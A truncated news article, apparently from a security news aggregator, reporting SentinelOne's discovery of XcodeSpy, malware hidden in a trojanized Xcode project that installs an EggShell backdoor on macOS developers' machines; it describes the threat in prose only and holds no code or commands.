Researchers from SentinelOne have discovered new malware targeting developers of macOS apps in the latest sign of growing attacker interest in the software supply chain.
The malware, XcodeSpy, is disguised as a legitimate Xcode open source project called TabBarInteraction that provides macOS developers with code for animating the iOS Tab Bar based on user interaction.
"Xcode is an Integrated Development Environment [IDE] provided by Apple for developers to create software applications for all of Apple's platforms," says Philip Stokes, threat researcher at SentinelOne.
It is free to download and use and is chiefly used by developers to create apps for iPhone, iPad apps, and the Mac, he says.
XcodeSpy installs a variant of the EggShell backdoor on an Apple developer's macOS system. The backdoor is designed to spy on the developer and has features for recording the victim's camera, microphone, and keyboard activity. It also has the ability to download and upload files and to remain persistent on an infected system.
The malware is executed when a developer using the Trojanized version of the TabBarInteraction Xcode project launches what is known as the build target in Xcode. The XcodeSpy malware contacts the attacker's command-and-control (C2) server and drops the EggShell backdoor on the development machine, SentinelOne said in a report this week.
"An Xcode project is a repository for all the files, resources, and information required to build one or more software products," Stokes says. "A project contains all the elements used to build a product and maintain the relationships between those elements."
Injecting malware into an Xcode project gives attackers a way ..
Support the originator by clicking the read the rest link below.
